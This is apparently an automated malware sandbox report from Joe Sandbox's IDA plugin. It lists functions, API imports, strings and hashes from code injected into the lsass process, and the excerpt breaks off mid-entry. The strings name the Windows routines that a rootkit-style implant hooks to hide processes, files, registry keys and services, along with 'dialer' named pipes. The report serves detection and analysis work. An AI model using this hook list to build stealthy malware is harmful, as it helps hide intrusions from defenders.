Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 7d8ed005e7d37bb82ea3d3b72fb397c75606bc28bfaac9853d2e4a3713813342
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 73B1C472212E50C1EB958FA9D6487A973E8FB84BACF5C5016EE0953794DF36EDA0C340

Function 00000261AC907E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000261AC907E8C
RtlCaptureContext.NTDLL ref: 00000261AC907EB9
RtlLookupFunctionEntry.NTDLL ref: 00000261AC907ED3
RtlVirtualUnwind.NTDLL ref: 00000261AC907F14
IsDebuggerPresent.KERNEL32 ref: 00000261AC907F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000261AC907F89
UnhandledExceptionFilter.KERNEL32 ref: 00000261AC907F94

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 82e4e63309bf2bfb59d987c27ecf3fdc2cd5bb3f11aefdcbffc84a1138e0cb86
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 59317072206B80D6EB609FA4E8443ED73B4F784758F48442ADB4E47B98EF39D958C714

Function 00000261AC90B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000261AC90B585
RtlLookupFunctionEntry.NTDLL ref: 00000261AC90B59D
RtlVirtualUnwind.NTDLL ref: 00000261AC90B5D8
IsDebuggerPresent.KERNEL32 ref: 00000261AC90B611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000261AC90B61B
UnhandledExceptionFilter.KERNEL32 ref: 00000261AC90B626

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 577cdc5f7814b05eb9a9f5cc1c02ea15c00ea5ce0ceb0bea8c8bd582dae4c8c0
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: E231B532205F80C6DB60CF65E94539E73A4F7887A8F580116EB9D43B68DF39C965CB00

Function 00000261AC90FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000261AC90FF67
WriteFile.KERNEL32 ref: 00000261AC91021E
WriteFile.KERNEL32 ref: 00000261AC910270
GetLastError.KERNEL32 ref: 00000261AC910372
GetLastError.KERNEL32 ref: 00000261AC9103D2

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 291a53735f111b48a05195555e3dd14167aaf9f4af2fa959fb2d0b1aaee81cdb
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 97E11332B05B80CAE740CFA4D2893DD7BB1F38579CF18511ADE4A57B99DA3AD926C700

Function 00000261AC9012C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000261AC901326
GetProcessHeap.KERNEL32 ref: 00000261AC901334
HeapAlloc.KERNEL32 ref: 00000261AC901345
RegEnumValueW.ADVAPI32 ref: 00000261AC9013A1

Part of subcall function 00000261AC901554: StrCmpIW.SHLWAPI ref: 00000261AC901585

GetProcessHeap.KERNEL32 ref: 00000261AC9013E9
HeapAlloc.KERNEL32 ref: 00000261AC9013F7
GetProcessHeap.KERNEL32 ref: 00000261AC90141B
HeapFree.KERNEL32 ref: 00000261AC901429
lstrlenW.KERNEL32 ref: 00000261AC901432
GetProcessHeap.KERNEL32 ref: 00000261AC901440
HeapAlloc.KERNEL32 ref: 00000261AC90144E
StrCpyW.SHLWAPI ref: 00000261AC901470
GetProcessHeap.KERNEL32 ref: 00000261AC901485
HeapFree.KERNEL32 ref: 00000261AC901493

Strings

d, xrefs: 00000261AC901365

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 9a848add8f4264c8747fb237369bc16771f614e46bc27cf40349c3e578bac85f
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 6251A1B2205B44D3EB50CFA6E64939A77B5F7C8B98F488128DB4907B24DF39D965C700

Function 00000261AC901EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000261AC901EBF

Part of subcall function 00000261AC902174: GetModuleHandleA.KERNEL32 ref: 00000261AC90218C
Part of subcall function 00000261AC902174: GetProcAddress.KERNEL32 ref: 00000261AC90219D

Part of subcall function 00000261AC905C10: GetCurrentThreadId.KERNEL32 ref: 00000261AC905C4B

Strings

NtDeviceIoControlFile, xrefs: 00000261AC901FF6
NtQueryDirectoryFile, xrefs: 00000261AC901F1F
NtResumeThread, xrefs: 00000261AC901F02
sechost.dll, xrefs: 00000261AC901FD9
EnumServicesStatusExW, xrefs: 00000261AC901FB1, 00000261AC901FD2
NtEnumerateValueKey, xrefs: 00000261AC901F76
NtEnumerateKey, xrefs: 00000261AC901F59
advapi32.dll, xrefs: 00000261AC901F97, 00000261AC901FB8
ntdll.dll, xrefs: 00000261AC901ECD
NtQuerySystemInformation, xrefs: 00000261AC901EE5
NtQueryDirectoryFileEx, xrefs: 00000261AC901F3C
EnumServiceGroupW, xrefs: 00000261AC901F90

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: f769cc3c37b2f718827cf62a100bd4b560becbb62617992d35fd2910eea173b4
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: BD319674203E4AE0FB85EFE5EF5E6D43331B78436CF8C54179519121669E3AAEA9C380

Function 00000261AC9023F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000261AC902405
GetCurrentProcessId.KERNEL32 ref: 00000261AC90240F

Part of subcall function 00000261AC9019AC: OpenProcess.KERNEL32 ref: 00000261AC9019CA
Part of subcall function 00000261AC9019AC: IsWow64Process.KERNEL32 ref: 00000261AC9019E0
Part of subcall function 00000261AC9019AC: CloseHandle.KERNEL32 ref: 00000261AC9019FB

CreateFileW.KERNEL32 ref: 00000261AC902468
WriteFile.KERNEL32 ref: 00000261AC902490
ReadFile.KERNEL32 ref: 00000261AC9024AF
CloseHandle.KERNEL32 ref: 00000261AC9024B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000261AC90243F
\\.\pipe\dialerchildproc64, xrefs: 00000261AC902438

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: bbf914e0b0b3795a5f1e94a938dcea64e6e3b9ba28933a567177a69e70b7768f
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: A621AC36615B40C3FB50CB65F60935A77B1F388BA8F880219EA5902BA8CF3DD958CB00

Function 00000261AC90D2CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00000261AC90D424

Strings

api-ms-, xrefs: 00000261AC90D391
ext-ms-, xrefs: 00000261AC90D3A4

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-$ext-ms-
API String ID: 190572456-537541572
Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction ID: 2163fba944bd6137ec74327d738e493e4ab06468bce84458ace676e7c080a3b1
Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction Fuzzy Hash: 9341A173313A40C5FA65CF969A0C7A96295B744BE8F0C55299D1E8F7D4DE3AEC25C300

Function 00000261AC90104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000261AC9010AB
RegEnumValueW.ADVAPI32 ref: 00000261AC90110E
GetProcessHeap.KERNEL32 ref: 00000261AC901155
HeapAlloc.KERNEL32 ref: 00000261AC901163
GetProcessHeap.KERNEL32 ref: 00000261AC901187
HeapFree.KERNEL32 ref: 00000261AC901195

Strings

d, xrefs: 00000261AC9010CE

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: dd091479e8f29d3b9dd80fb33157ba638634700dd1179569e4295042f79b9ea3
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 0641A373215B80D7E7A4CF95E54839AB7B1F389B98F048129DB8907B54DF39E564CB00

Function 00000261AC909804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000261AC909889
GetLastError.KERNEL32 ref: 00000261AC909897
LoadLibraryExW.KERNEL32 ref: 00000261AC9098C1
FreeLibrary.KERNEL32 ref: 00000261AC909907
GetProcAddress.KERNEL32 ref: 00000261AC909913

Strings

api-ms-, xrefs: 00000261AC9098A9

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 54c97a112f7ac961a1d855ead0f2abc894183abf3ecedc89bbc889489f707419
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 4331A231313B50D5EE55DB86AA0879963A4BB4CBB8F1E4529ED2D4B390DF39EC65C300

Function 00000261AC911B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000261AC911BCD
GetLastError.KERNEL32 ref: 00000261AC911BD9
CloseHandle.KERNEL32 ref: 00000261AC911BF1
CreateFileW.KERNEL32 ref: 00000261AC911C1C
WriteConsoleW.KERNEL32 ref: 00000261AC911C3B

Strings

CONOUT$, xrefs: 00000261AC911BFD

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 2d9cf5fd97bd50f63925a2a8b236dae44888205c90dea29a88fb9f526cf10471
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 82119032316F50C6E7918B86E94A31962B4F3C8FE8F084228EA5D87794CF3ADD24C740

Function 00000261AC905C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000261AC905C4B
GetThreadContext.KERNEL32 ref: 00000261AC905DB5

Part of subcall function 00000261AC905A40: GetCurrentThreadId.KERNEL32 ref: 00000261AC905A44

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: b8d73a251533bf7d5705ae63d7ed7ee47eeb2b56d79fbd5c3ae4a23db443b3fb
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: D5D1EE76209B88C1EA70DB4AE59835A77B0F3C8B98F140116EACD47BA5DF3DD961CB04

Function 00000261AC9030B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000261AC9030D7
HeapAlloc.KERNEL32 ref: 00000261AC9030EA
StrCmpNIW.SHLWAPI ref: 00000261AC90316B
GetProcessHeap.KERNEL32 ref: 00000261AC9031D1
HeapFree.KERNEL32 ref: 00000261AC9031DF

Strings

dialer, xrefs: 00000261AC903164

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 60cefdf3c800dba43227cc81b2c391a2d253679cfcbb88171eb21ae8216cbf90
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: A031DB71302B51D2EB91DF9AAA4836567A5FB487A8F0C40249F4807755EF39EFB1C700

Function 00000261AC901A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000261AC901A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000261AC901A58
PathFindFileNameW.SHLWAPI ref: 00000261AC901A67
lstrlenW.KERNEL32 ref: 00000261AC901A73
StrCpyW.SHLWAPI ref: 00000261AC901A86
CloseHandle.KERNEL32 ref: 00000261AC901A94

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 0200840e0fe56ffd4af8af3ee40f89a2f6a68e51358db5a200dc8555406b84a3
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: EF018B31301B81D6EA50DB96A55935967A4F788FD8F484038CE8943B54CF3AD995C300

Function 00000261AC9037AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000261AC9037C8
GetCurrentProcess.KERNEL32 ref: 00000261AC9037D6
VirtualProtectEx.KERNEL32 ref: 00000261AC9037F8
GetCurrentProcess.KERNEL32 ref: 00000261AC903819
VirtualProtectEx.KERNEL32 ref: 00000261AC90383A
TerminateThread.KERNEL32 ref: 00000261AC903849

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: c91eb7ea61f917b23f196bef12f2980d43e42ac997de2eab4c4d04c1821f5cbe
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 12118074313B40C6FB609BA5E90E71677B4BB88B99F080428CE5907754EF3ED928C700

Function 00000261AC903200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000261AC903222
StrCpyW.SHLWAPI ref: 00000261AC903232
StrCatW.SHLWAPI ref: 00000261AC90323E
PathCombineW.SHLWAPI ref: 00000261AC90324C

Strings

\\.\pipe\, xrefs: 00000261AC903218

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 6b7c93c663e96aca6081cbbc4f6539ba795be908b2b5302ad8724592aa496600
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 9BF08230305BC0D1EA409B9BBB0A1196669BB88FD8F0C8535DE5A47B28CE2DD9A1C300

Function 00000261AC90A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000261AC90A154
GetProcAddress.KERNEL32 ref: 00000261AC90A16A
FreeLibrary.KERNEL32 ref: 00000261AC90A187

Strings

CorExitProcess, xrefs: 00000261AC90A163
mscoree.dll, xrefs: 00000261AC90A14B

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 23f29a0e5de5f0719f90700654cd2b6b00c9e894801dbb97afcbaf02d7baa7f7
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 8FF05E71322B40D1EFC48FA4F98936827B4AB88B98F4C201D950B45561CE39DDA8C700

Function 00000261AC903878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000261AC903886
GetCurrentProcess.KERNEL32 ref: 00000261AC9038B4
VirtualProtectEx.KERNEL32 ref: 00000261AC9038D6
GetCurrentProcess.KERNEL32 ref: 00000261AC9038F4
VirtualProtectEx.KERNEL32 ref: 00000261AC903915

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: cbc89a7227a1b971b39513e3f5e984148f7588812dcd76ca77fc41db57e81c51
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: B6115E3A706B40C6EB549B9AF50936976B8F788B98F080029DE9907794EF3EDA14C700

Function 00000261AC908400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000261AC90840B
RtlLookupFunctionEntry.NTDLL ref: 00000261AC908425
RtlVirtualUnwind.NTDLL ref: 00000261AC90845C

Strings

NtQuerySystemInformation, xrefs: 00000261AC908402

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual
String ID: NtQuerySystemInformation
API String ID: 2154932578-2549949336
Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction ID: d62cc019df18ec8baf77d74c90a52356c93a1136b082d76ae4af6343e8fac9a5
Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction Fuzzy Hash: 96F0A473215780C2EB508B56F44436A6765F7C9BD4F480124EE4E46B44DF38D996CB04

Function 00000261AC9014B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000261AC9014D5
HeapFree.KERNEL32 ref: 00000261AC9014E4
GetProcessHeap.KERNEL32 ref: 00000261AC9014F0
HeapFree.KERNEL32 ref: 00000261AC9014FF
GetProcessHeap.KERNEL32 ref: 00000261AC90152A

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 440408a771c14eb1e1f195ef39f648939980ccaffd0beb8cf3d0145e8e806e17
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: D8115E71515B88D2E7549FAAA94821A7774F389B98F084129EB8A03724DF39D961C700

Function 00000261AC910860 Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 00000261AC910960
GetLastError.KERNEL32 ref: 00000261AC9109EA

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 2266a0273fe63437f9284d290f6990fba57a1e5969df2e9394dfeda2aff10efc
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 4481F332652740C9FB90ABE59A5E3AD27A0F7C4B9CF4C111ADE0A53795DB37AC62C310

Function 00000261AC907A40 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000261AC907A6C
GetCurrentThreadId.KERNEL32 ref: 00000261AC907A7A
GetCurrentProcessId.KERNEL32 ref: 00000261AC907A86
QueryPerformanceCounter.KERNEL32 ref: 00000261AC907A96

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction ID: 94ff431c7b926628b80feab7ebd132d972870395475862792deb17a3a9e63793
Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction Fuzzy Hash: B9113032301F41CAEB50CFA4E95A39433A4F75D76CF081A25EA6D46794DF39D6A5C340

Function 00000261AC9090D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 00000261AC9091E7

Strings

f, xrefs: 00000261AC909116
csm, xrefs: 00000261AC90917E

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 5a1ffb07863914cc3b45ee6b1d074dd3c0e9a35d77ca37f445d72484a081e205
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: AE51BE32312640CAEB54CF99E64CB1937A5F388BBCF5A8124EE5647789DB36ED61C700

Function 00000261AC9024DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000261AC9025C3
StrCpyW.SHLWAPI ref: 00000261AC9025DA

Strings

